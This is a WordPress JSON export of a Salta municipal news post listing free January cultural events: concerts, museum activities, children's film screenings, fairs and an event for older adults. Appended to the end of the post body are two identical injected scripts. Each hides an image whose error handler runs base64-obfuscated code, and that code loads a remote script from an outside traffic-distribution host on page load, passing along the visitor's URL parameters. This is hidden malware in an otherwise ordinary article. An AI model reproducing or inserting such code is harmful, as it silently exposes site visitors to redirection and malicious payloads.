{"id":3491,"date":"2024-01-10T10:41:42","date_gmt":"2024-01-10T13:41:42","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3491"},"modified":"2025-08-14T00:02:27","modified_gmt":"2025-08-14T03:02:27","slug":"el-municipio-invita-a-disfrutar-de-una-variada-agenda-de-actividades-durante-todo-enero","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3491","title":{"rendered":"El municipio invita a disfrutar de una variada agenda de actividades durante todo enero"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-ad610ea3aedb5834f428081ae6dc0ed5\" style=\"background-color:#04517d\"><strong><em>Habr\u00e1 show de m\u00fasica en vivo, cine, espect\u00e1culos para los m\u00e1s peque\u00f1os, muestras art\u00edsticas, juegos l\u00fadicos, talleres y mucho m\u00e1s. Todas a desarrollarse en los espacios municipales con entrada libre y gratuita.<\/em><\/strong><\/h4>\n\n\n\n<p>En el marco de las actividades de verano, la Municipalidad de Salta a trav\u00e9s de la Agencia Cultura Activa invita a vecinos y turistas a participar de las variadas propuestas para toda la familia.<\/p>\n\n\n\n<p>Habr\u00e1 show de m\u00fasica en vivo, cine, espect\u00e1culos para los m\u00e1s peque\u00f1os, muestras art\u00edsticas, juegos l\u00fadicos y mucho m\u00e1s. Todas a desarrollarse en los espacios municipales con entrada libre y gratuita.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"3493\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/feriasanluis5-1024x683.jpg\" alt=\"\" class=\"wp-image-3493\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/feriasanluis5-1024x683.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/feriasanluis5-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/feriasanluis5-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/feriasanluis5-1536x1024.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/feriasanluis5-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/feriasanluis5-1068x712.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/feriasanluis5-630x420.jpg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/feriasanluis5.jpg 1599w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"540\" height=\"381\" data-id=\"3492\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/museo-de-la-ciudad-casa-de-hernandez.jpg\" alt=\"\" class=\"wp-image-3492\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/museo-de-la-ciudad-casa-de-hernandez.jpg 540w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/museo-de-la-ciudad-casa-de-hernandez-300x212.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/museo-de-la-ciudad-casa-de-hernandez-100x70.jpg 100w\" sizes=\"(max-width: 540px) 100vw, 540px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"3494\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/casona-de-castanares-12-1024x683.jpeg\" alt=\"\" class=\"wp-image-3494\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/casona-de-castanares-12-1024x683.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/casona-de-castanares-12-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/casona-de-castanares-12-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/casona-de-castanares-12-1536x1024.jpeg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/casona-de-castanares-12-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/casona-de-castanares-12-1068x712.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/casona-de-castanares-12-630x420.jpeg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/casona-de-castanares-12.jpeg 1599w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p><strong>Cronograma de actividades para enero:<\/strong><\/p>\n\n\n\n<p>En el<strong>&nbsp;Centro Cultural Dino Saluzzi&nbsp;<\/strong>(Av. Independencia 910), en el marco del ciclo \u201cM\u00fasica en Vacaciones\u201d, se realizar\u00e1 la cl\u00ednica de Instrumentos de Viento con charlas motivacionales y ensamble. Ser\u00e1 en el horario de 9 a 12, este viernes 12 de enero.<\/p>\n\n\n\n<p>En el&nbsp;<strong>Museo de la Ciudad<\/strong>&nbsp;(La Florida 97), se desarrollar\u00e1 distintas muestras:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Viernes 12: los alumnos realizar\u00e1n una muestra art\u00edstica desde las 18.30 horas.<\/li>\n\n\n\n<li>Lunes 15, 22 y 29: tendr\u00e1 lugar el \u00abCiclo Ma\u00f1anitas de Enero\u00bb que consiste en una visita guiada y actividades l\u00fadicas art\u00edsticas en relaci\u00f3n a la muestra \u201c35 Pirulines\u201d del estudio de la profesora Silvia Katz. Destinado a las infancias de 5 a 12 a\u00f1os, ser\u00e1 todos los lunes de 11 a 12 horas.<\/li>\n\n\n\n<li>Viernes 19: se realizar\u00e1 la \u00abNarraci\u00f3n de Cuentos Infantiles y Taller\u00bb a cargo de Georgina Parpagnoli. Desde las 18 horas.<\/li>\n<\/ul>\n\n\n\n<p>En&nbsp; la&nbsp;<strong>Casona Finca Casta\u00f1ares<\/strong>&nbsp;( Houssay Bernardo Doctor S\/N) se desarrollar\u00e1 un Ciclo de Cine junto a distintas organizaciones barriales. Todas las funciones se dar\u00e1n en el horario de 16 a 18, en este espacio municipal.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Mi\u00e9rcoles 10: los invitados ser\u00e1n los ni\u00f1os y ni\u00f1as del Merendero Juancito de barrio 15 de febrero.<\/li>\n\n\n\n<li>S\u00e1bado 13: contar\u00e1 con la presencia de los ni\u00f1os y ni\u00f1as del Merendero Natali de Barrio 17 de octubre.<\/li>\n\n\n\n<li>Mi\u00e9rcoles 17: los invitados ser\u00e1n los chicos del Cuerpo Infantil de la Subcomisaria de Casta\u00f1ares.<\/li>\n\n\n\n<li>S\u00e1bado 20: asistir\u00e1n los ni\u00f1os del Hogar Casita de Luz de Barrio Universitario.<\/li>\n<\/ul>\n\n\n\n<p>En la&nbsp;<strong>zona San Luis<\/strong>, este domingo 14, en el marco de una nueva edici\u00f3n de la Feria Artesanal ( Cerro 20 de febrero Esq. RN 51) habr\u00e1 show en vivo y espect\u00e1culo infantil \u201cYanali\u201d para toda la familia, desde las 17 horas.<\/p>\n\n\n\n<p>En el macrocentro de la ciudad,&nbsp;<strong>en plaza Alvarado<\/strong>, se llevar\u00e1 a cabo la \u00abVI Feria Luna Llena de Mancias, Or\u00e1culos y Hol\u00edstica\u00bb. Tendr\u00e1 lugar el s\u00e1bado 20, de 17 a 00.<\/p>\n\n\n\n<p>En el&nbsp;<strong>Parque Bicentenario<\/strong>, habr\u00e1 una actividad integral \u00abMovete a lo Grande\u00bb, organizada por el \u00e1rea de Adultos Mayores de la Municipalidad. Ser\u00e1 el s\u00e1bado 27 de enero de 9 a 11 horas.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/prensa.municipalidadsalta.gob.ar\/el-municipio-invita-a-disfrutar-de-una-variada-agenda-de-actividades-durante-todo-enero\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/prensa.municipalidadsalta.gob.ar\/wp-content\/uploads\/2022\/03\/logo-salta-2024-8.png\" alt=\"\" style=\"width:123px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Habr\u00e1 show de m\u00fasica en vivo, cine, espect\u00e1culos para los m\u00e1s peque\u00f1os, muestras art\u00edsticas, juegos l\u00fadicos, talleres y mucho m\u00e1s. Todas a desarrollarse en los espacios municipales con entrada libre y gratuita. En el marco de las actividades de verano, la Municipalidad de Salta a trav\u00e9s de la Agencia Cultura Activa invita a vecinos y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3493,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11],"tags":[],"class_list":{"0":"post-3491","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3491"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3491"}],"version-history":[{"count":10,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3491\/revisions"}],"predecessor-version":[{"id":6878,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3491\/revisions\/6878"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3493"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3491"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3491"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3491"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}